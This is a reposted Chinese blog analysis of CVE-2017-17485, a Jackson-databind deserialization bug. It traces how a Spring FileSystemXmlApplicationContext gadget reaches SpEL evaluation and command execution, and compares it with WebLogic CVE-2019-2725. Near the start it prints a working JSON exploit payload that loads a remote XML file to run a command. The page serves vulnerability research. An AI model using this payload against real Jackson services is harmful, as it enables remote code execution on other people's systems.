CVE-2017-17485 Jackson-databind 反序列化

Jackson-databind的作用简单来说就是就是将json转换成对象。

0x02 漏洞分析

从payload来看,应该也是和

org.springframework.context.support.FileSystemXmlApplicationContext 这个有关系。

{"id":123, "obj": ["org.springframework.context.support.FileSystemXmlApplicationContext", "https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml"]}

在这个地方下一个断点

org/springframework/context/support/FileSystemXmlApplicationContext.class

CVE-2017-17485 Jackson-databind 反序列化

通过idea可以通过 diagramsShow Diagram Popup 查看类与接口之间的继承关系。

CVE-2017-17485 Jackson-databind 反序列化

beanFactory 中有 getBean构造方法

CVE-2017-17485 Jackson-databind 反序列化

而实际 getBean 的构造方法是在 AbstractBeanFactory 类中调用。

CVE-2017-17485 Jackson-databind 反序列化

我们试着在 AbstractBeanFactory 类中的 getBean 方法下个断点也就是说程序通过一系列的json反序列化,以及反射机制进入到了 getBean 方法,并且获取到了这个 name 为pb的方法。

CVE-2017-17485 Jackson-databind 反序列化

在org.springframework.beans.factory.support.BeanDefinitionValueResolver#resolveValueIfNecessary这里下断点,我看到经过 evaluate 处理之后 valueObject 等于我们要执行的 calc.exe

CVE-2017-17485 Jackson-databind 反序列化

这里看一下 evaluate 方法的实现。

CVE-2017-17485 Jackson-databind 反序列化

然后会继续解析 #{ pb.start() } ,对 #{ pb.start() } 进行spel操作。

CVE-2017-17485 Jackson-databind 反序列化

当解析完 pb.start 操作后就会命令执行。

CVE-2017-17485 Jackson-databind 反序列化

0x03 后话

回过头看一下发现 Weblogic-CVE-2019-2725 使用的 FileSystemXmlApplicationContextCVE-2017-17485 使用的 FileSystemXmlApplicationContext 相比缺少了一步表达式解析,也就是

Object valueObject = this.evaluate(typedStringValue);

CVE-2017-17485 Jackson-databind 反序列化

CVE-2017-17485 Jackson-databind 反序列化

那我试试看,调整一下payload,当然也是可以的。

CVE-2017-17485 Jackson-databind 反序列化

也就是说实际上 CVE-2017-17485 所用到的spring版本为5.0.2,它足够高,支持spel表达式的方法来初始化 bean 对象,而 Weblogic-CVE-2019-2725 所用到的spring版本过低,无法支持spel表达式,所以它需要通过指定 init-method 的方法来初始化 bean 对象。

原文 

http://www.lmxspace.com/2019/05/16/CVE-2017-17485-Jackson-databind-反序列化/

本站部分文章源于互联网,本着传播知识、有益学习和研究的目的进行的转载,为网友免费提供。如有著作权人或出版方提出异议,本站将立即删除。如果您对文章转载有任何疑问请告之我们,以便我们及时纠正。

PS:推荐一个微信公众号: askHarries 或者qq群:474807195,里面会分享一些资深架构师录制的视频录像:有Spring,MyBatis,Netty源码分析,高并发、高性能、分布式、微服务架构的原理,JVM性能优化这些成为架构师必备的知识体系。还能领取免费的学习资源,目前受益良多

转载请注明原文出处:Harries Blog™ » CVE-2017-17485 Jackson-databind 反序列化

赞 (0)
分享到:更多 ()

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址